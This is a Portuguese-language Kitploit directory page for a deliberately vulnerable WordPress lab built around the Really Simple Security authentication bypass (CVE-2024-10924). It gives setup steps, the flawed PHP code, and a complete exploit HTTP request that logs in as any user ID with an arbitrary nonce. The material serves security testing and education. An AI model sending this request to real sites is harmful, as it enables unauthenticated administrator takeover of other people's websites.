Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
wordpress-really-simple-security-authn-bypass-vulnerable-application — AVISO: Esta é uma aplicação vulnerável para testar o exploit do bypass de autenticação do Really Simple Security < 9.1.2 (CVE-2024-10924). Execute-o por sua conta e risco! | Kitploit
Ferramentas/GitHubGitHub/m3ssap0/wordpress-really-simple-security-authn-bypass-vulnerable-application
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAutenticaçãoLabs e Prática
GitHubm3ssap0/wordpress-really-simple-security-authn-bypass-vulnerable-application

wordpress-really-simple-security-authn-bypass-vulnerable-application

AVISO: Esta é uma aplicação vulnerável para testar o exploit do bypass de autenticação do Really Simple Security < 9.1.2 (CVE-2024-10924). Execute-o por sua conta e risco!

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
8há 1 anoAinda não revisado

wordpress-really-simple-security-authn-bypass-vulnerable-application

Este é um aplicativo vulnerável para testar o exploit do bypass de autenticação do Really Simple Security < 9.1.2 (CVE-2024-10924).

AVISO!

Este aplicativo contém vulnerabilidades de segurança graves. Use-o por sua conta e risco! Recomenda-se usar um ambiente com backup e isolado (como uma VM com snapshot recente e rede somente host). Não envie este aplicativo para servidores expostos à Internet, pois eles serão comprometidos.

AVISO LEGAL: Não me responsabilizo pela forma como qualquer pessoa utiliza este aplicativo. O único propósito deste aplicativo é ser um cenário de teste para o exploit do bypass de autenticação do Really Simple Security < 9.1.2 (CVE-2024-10924) e ele não deve ser usado de forma maliciosa. Se o seu servidor for comprometido por meio de uma instalação deste aplicativo, a responsabilidade não é minha, mas sim da(s) pessoa(s) que o enviou e o instalou.

Informações da vulnerabilidade

  • CVE-ID: CVE-2024-10924
  • Link: https://www.cve.org/CVERecord?id=CVE-2024-10924
  • Descrição: Isso possibilita que atacantes não autenticados entrem como qualquer usuário existente no site, como um administrador, quando a configuração "Autenticação de Dois Fatores" está habilitada (desabilitada por padrão).
  • Correção: https://plugins.trac.wordpress.org/changeset/3188431/really-simple-ssl
  • Boletim da Wordfence: https://www.wordfence.com/threat-intel/vulnerabilities/detail/really-simple-security-free-pro-and-pro-multisite-900-9111-authentication-bypass

Uso

Aqui estão as etapas para configurar o ambiente:

  1. Execute ./up.sh para iniciar a composição.
  2. Conclua a instalação do WordPress aqui: https://localhost:1337/wp-admin/install.php.
  3. Entre no WordPress.
  4. Vá até "Plugins": https://localhost:1337/wp-admin/plugins.php.
  5. Clique em "Ativar" no plugin "Really Simple Security". NÃO O ATUALIZE, pois precisamos da versão vulnerável.
  6. Clique em "Cancelar" no pop-up referente à ativação do SSL.
  7. Vá em "Ajustes" > "Proteção de Login" > "Autenticação de Dois Fatores" e, na seção "Autenticação de Dois Fatores", habilite "Ativar Autenticação de Dois Fatores".
  8. Clique no botão "Salvar".

O container será chamado vuln-wp-really-simple-security.

Para remover o ambiente use o comando ./down.sh ou o comando ./down_and_delete.sh para remover também as imagens e o volume do banco de dados.

Causa raiz

Observando a correção, é possível entender que, na versão vulnerável, um objeto de erro era retornado, em caso de nonce de login inválido, pela função check_login_and_get_user(), sem abortar toda a operação.

root@kitploit:~
private function check_login_and_get_user( int $user_id, string $login_nonce ) {
    if ( ! Rsssl_Two_Fa_Authentication::verify_login_nonce( $user_id, $login_nonce ) ) {
        return new WP_REST_Response( array( 'error' => 'Invalid login nonce' ), 403 );
    }

    /**
     * Get the user by the user ID.
     *
     * @var WP_User $user
     */
    $user = get_user_by( 'id', $user_id );
    return $user;
}

No chamador, no entanto, nenhuma verificação era feita na saída da função check_login_and_get_user() (linha 277), simplesmente avançando para a função authenticate_and_redirect() (linha 278) usando o mesmo valor recebido da entrada para o ID do usuário.

root@kitploit:~
public function skip_onboarding( WP_REST_Request $request ): WP_REST_Response {
	$parameters = new Rsssl_Request_Parameters( $request );
	// As a double we check the user_id with the login nonce.
	$user = $this->check_login_and_get_user( (int)$parameters->user_id, $parameters->login_nonce );
	return $this->authenticate_and_redirect( $parameters->user_id, $parameters->redirect_to );
}

Exploit

Para explorar a vulnerabilidade, uma requisição como a seguinte é suficiente.

root@kitploit:~
POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1
Host: localhost:1337
Content-Type: application/json
Content-Length: 88
Connection: keep-alive

{
    "user_id": 1,
    "login_nonce": "133333337",
    "redirect_to": "/wp-admin/"
}

Em seguida, defina os cookies de sessão retornados no navegador.

O user_id deve ser o ID do usuário alvo; o login_nonce pode ser qualquer coisa, pois um valor incorreto não bloqueará o processo.

Um script de exploit em Python pode ser encontrado aqui.

Autores

  • Antonio Francesco Sardella - implementação - m3ssap0

Licença

Este projeto é licenciado sob a Unlicense - consulte o arquivo LICENSE para obter detalhes.

Agradecimentos

  • István Márton, o pesquisador de segurança que descobriu a vulnerabilidade.
Baixar ferramenta